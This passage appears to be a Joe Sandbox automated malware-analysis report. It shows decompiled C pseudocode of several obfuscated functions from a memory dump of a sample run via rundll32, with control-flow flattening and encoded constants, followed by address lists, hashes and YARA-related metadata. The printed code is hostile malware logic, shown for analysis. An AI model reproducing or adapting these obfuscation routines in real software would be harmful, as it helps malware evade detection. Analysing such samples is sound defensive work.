				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002478A5(_t315, _t315, 0x10, _t315, 4);
							E00247787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00247787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002478A5(_t315, _t315, 0x10, _t315, 4);
								E00247787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00258C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00247787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00251be8
0x00251bf0
0x00251bf7
0x00251bfd
0x00251c04
0x00251c09
0x00251c10
0x00251c17
0x00251c23
0x00251c28
0x00251c2d
0x00251c34
0x00251c3e
0x00251c43
0x00251c48
0x00251c4f
0x00251c52
0x00251c59
0x00251c60
0x00251c67
0x00251c71
0x00251c76
0x00251c7b
0x00251c82
0x00251c89
0x00251c8d
0x00251c90
0x00251c97
0x00251c9e
0x00251ca5
0x00251cac
0x00251cb6
0x00251cbb
0x00251cc0
0x00251cc7
0x00251cce
0x00251cd5
0x00251cd9
0x00251cdd
0x00251ce4
0x00251cef
0x00251cf0
0x00251cf3
0x00251cfa
0x00251d01
0x00251d08
0x00251d0c
0x00251d13
0x00251d17
0x00251d1e
0x00251d25
0x00251d29
0x00251d30
0x00251d37
0x00251d3e
0x00251d4a
0x00251d4d
0x00251d54
0x00251d63
0x00251d66
0x00251d69
0x00251d70
0x00251d7e
0x00251d81
0x00251d88
0x00251d8f
0x00251d96
0x00251d9a
0x00251da1
0x00251da8
0x00251db3
0x00251db6
0x00251db9
0x00251dc4
0x00251dc7
0x00251dce
0x00251dd9
0x00251ddc
0x00251de6
0x00251de9
0x00251df0
0x00251df7
0x00251dfb
0x00251e02
0x00251e0d
0x00251e0e
0x00251e11
0x00251e18
0x00251e1f
0x00251e26
0x00251e32
0x00251e35
0x00251e3c
0x00251e43
0x00251e4a
0x00251e51
0x00251e58
0x00251e5f
0x00251e66
0x00251e6d
0x00251e71
0x00251e79
0x00251e7c
0x00251e83
0x00251e8a
0x00251e8e
0x00251e92
0x00251e99
0x00251ea0
0x00251ea7
0x00251eb2
0x00251eb5
0x00251ebc
0x00251ec3
0x00251eca
0x00251ed1
0x00251ed8
0x00251ee6
0x00251eeb
0x00251eee
0x00251ef5
0x00251ef6
0x00251ef6
0x00251f08
0x00251f99
0x00251fac
0x00251fb1
0x00251fc8
0x00251fcd
0x00251fd0
0x00251fd3
0x00251fda
0x00251fdb
0x00251fde
0x00000000
0x00251f0a
0x00251f10
0x00251f4e
0x00251f61
0x00251f66
0x00251f69
0x00251f6c
0x00251f73
0x00251f74
0x00251f77
0x00000000
0x00251f12
0x00251f18
0x00251f24
0x00251f29
0x00251f2c
0x00000000
0x00251f2c
0x00251f18
0x00251f10
0x00000000
0x00251f08
0x00251ffb
0x00252000
0x00252005
0x00252008
0x0025200d
0x00252010
0x00252012
0x00252012
0x00252024

Strings

5}X, xrefs: 00251CFA

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 4c1769b2fc25b4559d81a8017bd6ec2d08264628a188b42135de96222fd5b1ae
Instruction ID: c4065f2b9dbc989722528489b852fa503e7342455a63b2f74aadb0000dc2471b
Opcode Fuzzy Hash: 4c1769b2fc25b4559d81a8017bd6ec2d08264628a188b42135de96222fd5b1ae
Instruction Fuzzy Hash: A5D12371D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E512BA2A0D7B91A56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002462A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002462A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0025889D(0x25c930, _v76, __eflags);
							_t182 =  *0x25ca2c; // 0x2c8300
							_t206 =  *0x25ca2c; // 0x2c8300
							E002429E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00252025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0024C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0024568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x002462ac
0x002462b8
0x002462ba
0x002462bf
0x002462c2
0x002462c9
0x002462cd
0x002462d1
0x002462d8
0x002462e4
0x002462e9
0x002462ee
0x002462f5
0x002462fc
0x00246303
0x00246307
0x0024630b
0x00246312
0x00246319
0x0024631d
0x00246321
0x00246328
0x00246333
0x00246336
0x00246339
0x00246340
0x00246347
0x0024634e
0x00246355
0x0024635c
0x00246363
0x0024636a
0x00246371
0x00246378
0x0024637f
0x00246386
0x00246394
0x00246397
0x0024639e
0x002463a5
0x002463ac
0x002463b3
0x002463ba
0x002463be
0x002463c5
0x002463cc
0x002463d3
0x002463dd
0x002463e0
0x002463e3
0x002463ea
0x002463f1
0x002463f5
0x002463f9
0x00246400
0x00246407
0x00246412
0x00246419
0x0024641c
0x00246423
0x0024642a
0x00246431
0x00246435
0x0024643c
0x00246448
0x0024644f
0x00246456
0x0024645d
0x00246464
0x0024646b
0x00246472
0x00246479
0x0024647d
0x00246484
0x0024648f
0x00246492
0x00246496
0x0024649d
0x002464a4
0x002464a8
0x002464af
0x002464b6
0x002464b6
0x002464c4
0x002464f7
0x00246502
0x0024651c
0x00246530
0x0024653c
0x0024654c
0x00246551
0x00246554
0x00000000
0x002464c6
0x002464cc
0x002464d2
0x002464d3
0x002464eb
0x002464f0
0x002464f3
0x00000000
0x002464f3
0x002464cc
0x00000000
0x002464c4
0x0024655e
0x0024655f
0x0024656a
0x0024656c
0x0024656f
0x00246571
0x00246577
0x00246578
0x0024657f
0x00246583
0x00246585
0x00246588
0x0024658d
0x0024658d
0x0024658d
0x002465a1

Strings

I%p , xrefs: 00246443

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 2c7638443a9c0c1e3d64a9c494bb24f8a54b54f54b002d4ed92aa167cc4fae21
Instruction ID: 40ad01a0e1e8b7280b3fb945df5c4b78b7146ea5e040b97be6bff2c796fa4a3f
Opcode Fuzzy Hash: 2c7638443a9c0c1e3d64a9c494bb24f8a54b54f54b002d4ed92aa167cc4fae21
Instruction Fuzzy Hash: F08137B1D0021DABDF58CFE5D94A5DEFBB1FB44318F208059E511B62A0D7B80A09CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00250D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00250D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00258C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002478A5(_t158, _t158, _v16, _t158, _v8);
				E00247787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00250d3b
0x00250d3e
0x00250d40
0x00250d43
0x00250d47
0x00250d48
0x00250d4d
0x00250d57
0x00250d5d
0x00250d64
0x00250d6b
0x00250d72
0x00250d7f
0x00250d82
0x00250d85
0x00250d8c
0x00250d93
0x00250da1
0x00250da4
0x00250dab
0x00250db6
0x00250db7
0x00250dba
0x00250dc1
0x00250dc8
0x00250dcf
0x00250dd3
0x00250dda
0x00250de1
0x00250de5
0x00250dec
0x00250df0
0x00250df7
0x00250e05
0x00250e08
0x00250e0f
0x00250e1b
0x00250e1e
0x00250e25
0x00250e2c
0x00250e30
0x00250e37
0x00250e3e
0x00250e45
0x00250e4c
0x00250e53
0x00250e5e
0x00250e61
0x00250e73
0x00250e78
0x00250e7f
0x00250e86
0x00250e8d
0x00250e94
0x00250e9b
0x00250ea7
0x00250eaa
0x00250eaf
0x00250ebb
0x00250ebe
0x00250ec1
0x00250ee5
0x00250ef8
0x00250f02
0x00250f0b

Strings

D}0, xrefs: 00250DC1

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 62a8c1827b629aa41a560ca34caf653983dc59df2835fb2d56f630d82789c00d
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: 6351F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44314F108199E111B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0025340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0025340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0024B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002550F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00258F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00253411
0x00253418
0x0025341a
0x0025341b
0x00253422
0x00253423
0x00253424
0x00253429
0x00253431
0x00253433
0x0025343b
0x0025343e
0x00253444
0x0025344c
0x00253451
0x00253456
0x0025345e
0x00253466
0x0025346e
0x00253476
0x0025347b
0x0025348a
0x0025348b
0x0025348f
0x00253497
0x002534a4
0x002534a8
0x002534b0
0x002534b8
0x002534c0
0x002534c8
0x002534d0
0x002534d8
0x002534e0
0x002534e8
0x002534f0
0x00253503
0x00253507
0x0025350c
0x00253514
0x0025351c
0x00253524
0x00253529
0x00253531
0x00253539
0x00253541
0x00253549
0x00253551
0x00253559
0x0025355e
0x00253566
0x0025356e
0x0025356e
0x00253578
0x00253600
0x00253602
0x0025357a
0x00253580
0x002535a2
0x002535a7
0x002535aa
0x00000000
0x00253582
0x00253588
0x00000000
0x0025358a
0x0025358a
0x00000000
0x0025358a
0x00253588
0x00253580
0x00253606
0x0025360e
0x0025360e
0x002535c6
0x002535cb
0x002535ce
0x002535d0
0x002535d6
0x00000000
0x002535d2
0x002535d2
0x00000000
0x002535d2
0x00000000
0x002535db
0x002535db
0x002535db
0x00000000

Strings

@d, xrefs: 00253549

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: 0e586e56164d2aadcc731a171f42eb7970a348c87ea7406acbc7406152a56118
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: 2C5178711083429BD318CF21C84A81FFBE1BBD8788F505A2DF99652160D7B5CB198F8B

Uniqueness

Uniqueness Score: -1.00%

Function 00253FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00253FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00258F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002550F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0024B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00253fee
0x00253ff5
0x00253ff7
0x00253ffe
0x00253fff
0x00254000
0x00254005
0x0025400d
0x00254016
0x00254018
0x00254024
0x00254029
0x0025402f
0x00254037
0x0025403f
0x00254047
0x0025404f
0x00254057
0x0025405f
0x0025406c
0x0025406d
0x00254071
0x00254079
0x00254081
0x00254089
0x00254091
0x00254099
0x002540a1
0x002540a9
0x002540ae
0x002540b6
0x002540be
0x002540c6
0x002540ce
0x002540d6
0x002540db
0x002540e3
0x002540eb
0x002540fb
0x002540ff
0x00254107
0x00254114
0x00254118
0x00254120
0x00254120
0x0025412a
0x002541b1
0x002541b3
0x0025412c
0x0025412e
0x00254153
0x00254158
0x0025415b
0x00000000
0x00254130
0x00254136
0x00000000
0x00254138
0x00254138
0x00000000
0x00254138
0x00254136
0x0025412e
0x002541b7
0x002541bf
0x002541bf
0x00254177
0x00254179
0x0025417f
0x00000000
0x0025417b
0x0025417b
0x00000000
0x0025417b
0x00000000
0x00254184
0x00254184
0x00254184
0x00000000

Strings

tx, xrefs: 0025402F

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: tx
API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: 166ad5dfaa2aff8007266d51ab8073bceeb9e20790f3c6e77f6e813c996e8bbf
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: FD41AC715083429BE718DE21C48582BFBE1FBD8718F108A1DF9C996260D7B5CA59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002460B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002460B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
